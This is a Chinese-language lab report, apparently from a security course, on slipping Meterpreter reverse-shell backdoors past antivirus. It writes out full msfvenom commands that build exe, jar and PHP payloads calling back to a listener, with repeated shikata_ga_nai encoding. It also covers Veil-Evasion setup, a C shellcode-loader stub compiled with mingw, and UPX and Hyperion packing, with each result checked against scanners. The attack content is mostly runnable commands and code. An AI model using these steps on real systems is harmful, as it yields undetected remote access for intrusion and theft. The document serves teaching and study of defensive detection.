一, 实验内容
任务一正确使用 msf 编码器, msfvenom 生成如 jar 之类的其他文件, veil-evasion, 利用 shellcode 编程等免杀工具或技巧
1, 使用 msf 编码器, 生成 exe 文件
使用 exp2 中生产的后门程序
20165334_backdoor.exe
利用 VirusTotal https://www.virustotal.com/ 网站进行扫描检测.
20165334_backdoor.exe
利用 Virscan http://www.virscan.org/ 网站进行扫描检测.
- 使 msf 编码器对后门程序进行多次的编码, 并检测.
msfvenom -p Windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' LHOST=192.168.56.102 LPORT=5334 -f exe> met-lt5334l.exe
用使用 virscan 进行扫描, 结果如下所示
msfvenom 生成 jar 文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar
用使用 virscan 进行扫描, 结果如下所示
msfvenom 生成 PHP 文件
msfvenom -p PHP/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> 20155334_backdoor.PHP
用使用 virscan 进行扫描, 结果如下所示
2, 使用 veil-evasion 生成后门程序及检测
用
sudo apt-get install veil
命令安装 Veil, 若遇到问题则用
sudo apt-get upgrade
这两个命令更新一下软件包即可之后用 veil 打开 veil, 输入 y 继续安装直至完成.
- 设置反弹连接 IP
- set LHOST 192.168.56.102
- (IP 是 KaliIP)
设置端口 set LPORT 5334
输入 generate 生成文件, 接着输入你想要 playload 的名字: baddoor5334
扫描检测
3, 半手工注入 Shellcode 并执行
使用命令
msfvenom -p Windows/meterpreter/reverse_tcp LHOST=192.168.56.102LPORT=5334 -f c
用 c 语言生成一段 shellcode
- 利用上面生成的数组拿来编写一个程序, 结构如下
- unsigned char buf[] =
- "此处复制粘贴之前用 msf 生成的 buf"
- int main()
- {
- int (*func)() = (int(*)())buf;
- func();
- }
使用命令
i686-w64-mingw32-g++ shell5334.c -o shell5334.exe
编译
扫描检测
-x 尝试运行结果被 360 拦截了.
以上尝试可以看出没有处理的后门程序基本上都可以检测出来.
加壳
压缩壳 : 减少应用体积, 如 ASPack,UPX
加密壳: 版权保护, 反跟踪. 如 ASProtect,Armadillo
虚拟机 : 通过类似编译手段, 将应用指令转换为自己设计的指令集. 如 VMProtect,Themida
1, 使用压缩壳 (UPX)
还是没能幸免, 立刻被杀软截杀
在 360 中添加信任后测试其可用性.
2, 加密壳 Hyperion
将上一个生成的文件拷贝到
/usr/share/Windows-binaries/hyperion/
目录中
进入目录
/usr/share/Windows-binaries/hyperion/
中
输入命令
wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe
进行加壳
反弹连接
检测结果
来源: http://www.bubuko.com/infodetail-3004344.html